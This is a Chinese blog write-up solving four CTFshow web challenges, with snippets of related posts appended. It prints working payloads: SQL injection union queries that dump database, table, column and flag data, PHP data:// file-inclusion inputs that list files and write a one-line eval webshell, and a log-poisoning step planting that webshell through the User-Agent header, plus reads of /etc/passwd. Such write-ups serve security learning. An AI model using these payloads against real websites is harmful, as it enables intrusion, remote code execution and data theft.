记一次很简单的web题——CTFshow-WEB(1-4)

最新推荐文章于 2026-05-14 19:31:13 发布
原创 最新推荐文章于 2026-05-14 19:31:13 发布 · 1.2k 阅读 · 6 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文记录了CTF比赛中关于WEB的四道题目的解题过程,包括从查看源代码获取flag,利用SQL注入进行爆库,通过PHP文件包含漏洞读取文件,以及使用日志注入技术找到隐藏flag。详细介绍了每一步的操作和思考过程。

CTFshow之Web

web1

签到题,直接查看网页源代码,发现注释中有一串字符
ZmxhZ3s1NDliMDkyYi0yYzkwLTQ1MTktYmY5OC05YTg0MmI4MTdkODV9
在这里插入图片描述将此字符串进行base64解码即可得到flag
在这里插入图片描述

WEB2—SQL注入

题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin'or 1=1#
在这里插入图片描述
之后发现有回显,说明存在sql注入,且用户名是ctfshow
接下来进行order by 判断字段数
在这里插入图片描述
查看源代码可知此登录页面使用POST传参,所以我们使用HackBar进行注入,而不能直接在url栏里进行注入。
输入 username=ctfshow'order by 4#&password=1没有回显,说明字段数小于4,继续试order by 3
在这里插入图片描述在这里插入图片描述有回显了,说明字段数就是3。
然后利用联合查询进行爆库
username=ctfshow’ union select 1,database(),3#&password=1在这里插入图片描述当前所在库为web2,然后接着爆表
username=ctfshow’union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#&password=1在这里插入图片描述发现有两个表,其中第一个表便是flag
接着爆字段
username=ctfshow’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#&password=1
在这里插入图片描述说明flag表中只有flag一个字段
接着爆flag字段里的信息
username=ctfshow’union select 1,group_concat(flag),3 from flag#&password=1
在这里插入图片描述即可得到本题的flag

WEB3—php文件包含

在这里插入图片描述

网页打开是这样,很明显是php文件包含,但我们还是进行测试一下

打开网站提示输入url,测试/etc/passwd成功显示,应为文件包含漏洞

第一种方法:
php伪协议中的data通过通配符查找目录下的所有文件
url=data://text/plain,<?php print_r(glob("*")); ?>
在这里插入图片描述然后直接访问ctf_go_go_go,发现是让你下载一个文件,打开这个文件即可得到flag
第二种方法
写入一句话菜刀连接
url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['hack']);?>")?>
在这里插入图片描述
这道题用到了php伪协议,常见的php伪协议及用法:https://blog.csdn.net/yao_xin_de_yuan/article/details/108326427

在这里插入图片描述

web4—文件包含漏洞(日志注入)

页面同上一题
尝试相同的解法,发现过滤了php。但是/etc/passwd依然可以显示,猜测仍为文件包含漏洞,尝试其他利用方式
在这里插入图片描述在这里插入图片描述同样尝试第三题的data通配符查看所有文件的方法,输入/?url=data://text/plain,<?php print_r(glob("*")); ?>,发现页面报错

在这里插入图片描述
所以判断可能把php过滤掉了
然后我们来尝试进行日志注入,我们根据响应头可以知道服务器为nginx,nginx存放日志文件的目录为/var/log/nginx/access.log/var/log/nginx/error.log
在这里插入图片描述
构造url为url=/var/log/nginx/access.log查看服务器日志文件
在这里插入图片描述为了防止url编码,需要在burp中修改UA为<?php eval($_POST['hack']);?>
在这里插入图片描述
接着用菜刀或者蚁剑连接
在这里插入图片描述在这里插入图片描述
找到了,得来全不费功夫
拿到flag为ctfshow{a5dc3fe3-071e-44da-9519-59a1f6a2c30f}

ctf.show_web4
Kavint的博客
04-20 897
F12打开网络栏,可以看到Server里面是nginx,尝试一下日志注入。用Burp Suite抓包,在User-Agent后面写个🐎。注意URL地址写的是日志地址,因为我们的🐎是传进日志里了。此时木马已经插入进去了,日志中的代码会被执行但不会显示。($_GET['url'])可看出存在文件包含漏洞。放包,注意看日志下面这时多出来一条。nginx服务器默认日志位置在。在上层可以看到flag.txt。在url后面输入查看一下。
ctf.show Web4
hp.puppy的博客
03-24 586
1.首先, 访问一下web服务器的日志文件( Nginx日志文件的默认位置是/var/log/nginx/access.log)(Windows日志文件的默认位置是 C盘/Windows/system32/winevt/logs)2.使用代理工具( Burp Suite)在请求头User-Agent的内容中插入后门。3.使用蚁剑链接,注意url,删除https协议里的s。在www目录下发现flag.txt。
ctfshow——web1-7wp
最新发布
jiangxi_DT的博客
05-14 543
url=flag.php 那么flag.php文件会被导入当前工作文件下,flag就回显出来了,但是现在无法确定flag在什么文件里。进入页面后,代码很简单GET传参v1和v2,其中v1必须为字符或字符串,v2必须为数字,且当两个变量的MD5值相同时,输出flag。这里注意:php://input 可以往请求体里写入数据,配合include文件包含漏洞,可以将post体里的内容直执行,但是。思路:md5在弱比较时,让两变量值以0e开头,对比就会认为0的任何次方都为0,这样0=0达到绕过的效果。
ctfshow-萌新-web4( 利用逻辑运算符绕过获取网站敏感信息)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web4关,这一关考察的是 intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了or,加减乘除(+-*/),左右移,括号,|,select等关键字,我们使用短路逻辑或(||)来替替代or 即可 页面中展示了部分源码,提示我们 id=1000 时,即可获取flag 首先分析一下思路,源码中过滤了参数中的 or - / * < > ! ( ) + select 等关键字,所以我们的参数中不能包含这些关键字,否则会直接 d...
ctfshow-WEB-web4
wangyuxiang946的博客
08-20 1万+
ctf.show WEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell; 然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell 页面最明显的位置展示了源码的核心,提示我们利用文件包含漏洞 包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问录,包括HTTP请求行...
ctfshow-web4
好靶场的博客
08-04 861
默认nginx日志是:/var/log/nginx/access.log,可以看到录了请求。那么我们就可以修改ua头进行代码注入,如果存在ssh连接的话,用ssh日志也可以。然后cat一下获取到flag。
[CTF夺旗赛] CTFshow Web1-14 详细过程保姆级教程~
热门推荐
Da1NtY的博客
09-09 2万+
CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
CTFShow Web1 签到
kater_1的博客
02-05 1594
ctfshow平台Web
weixin_53268624的博客
04-19 2837
ctfshow web 蹭人家号 前100
ctfshow萌新区web1~21
qq_46041723的博客
12-10 6552
萌新前言萌新web1web2web3web4web5web6web7web8web9web10web11web12web 13用到的知识web14web15web16web17web18web19web20web21 前言 经常做ctfshow上面的目,发现这个是真心的不错,就是除了做不出来也没什么了,害! 萌新 web1 没啥好说的,看到源码提示id不能大于999,还要等于1000,直接取反,payload?id=~~1000,没过滤,直接得到flag web2 细节同上 web3 同上 web4 同上
CTFshow web入门 web4
weixin_45990644的博客
07-07 939
CTFshow web入门 web4 目提示robots,看了些文章反应过来时是关于robots的协议问,利用“robots.txt”来进行查看链接: 打开之后发现这些代码,百度了一下是些Roberts协议。 User-agent: * 表示所有的搜索引擎种类,*是一个通配符。 Disallow: /flagishere.txt表示是禁止爬取名为flagishere的txt文件。 本着实验的心态在链接后面加了/flagishere.txt试了试,最后得到了flag 。 补充 因为之前没有接触过爬虫,
CTF show web4
qq_43039823的博客
07-22 1258
这个长得跟web3很相似,但是实际上内容不同,得到flag的姿势也是各不相同。 打开目界面,依旧是老样子,上边光秃秃的就一句include ....结合上目的知识很清晰的判断出是文件包含漏洞。“PHP:include(), include_once(), require(), require_once()等 老姿势 , url=/etc/passwd 依旧能读出用户的属性,文件包含确认! 尝试着跟上一个目的思路一样,打开burp 加上一句<?php system("ls")?&g...
CTFshow web4 详解
lzu_lfl的博客
10-15 3996
日志写码getshell
web入门小
sworddancing is the best one
07-16 377
第一:  点击目连接,查看网页源代码,如下图:  将选框里文本的最大长度更改为更大的数即可接。本提供了web的一种思路:即查看网页源代码。   第二: 这思路很明确,即使对nmap的考察, 登陆kali虚拟机,打开终端,输入命令  nmap +ip地址 即可获得端口信息 这里主要对nmap的用法多费一些笔墨,nmap有叫做 network mapper(网络...
ctfshow.web4
weixin_71543329的博客
12-23 1089
日志文件会保存网站的访问录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。2.同web3一样先使用php伪协议,php://input 发现会被过滤掉,换成PHp这种不行,应该被过滤掉了,所以使用别的方法考虑。日志路径:/var/log/nginx/access.log和 /var/log/nginx/error.log。
CTF_ctfshow_web4
weixin_54227009的博客
05-13 1246
打开网页发现和web3差不多,文件包含url 但尝试了web3,发现error了 伪协议用不了了 可以尝试用一句话连接,bp抓包,上传一句话 但一句话不知是传到了哪个路径下, 查看网络: 发现是nginx,nginx的日志文件在/var/log/ngnix/access.log或/var/log/ngnix/error.log 故,一句话可以传到日志目录下 将User-Agent这里写进一句话 上传成功: 路径:ctf.show_web4http://f30ab..
ctf.show-web-web4-flag获取详解、总结
m0_56970656的博客
07-19 948
基于日志注入的webshell,如果没有提示,知识面还是要扩展一下...
CTF.show-WEB入门-web4
m0_73912575的博客
10-27 208
CTF.show-WEB入门-web4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值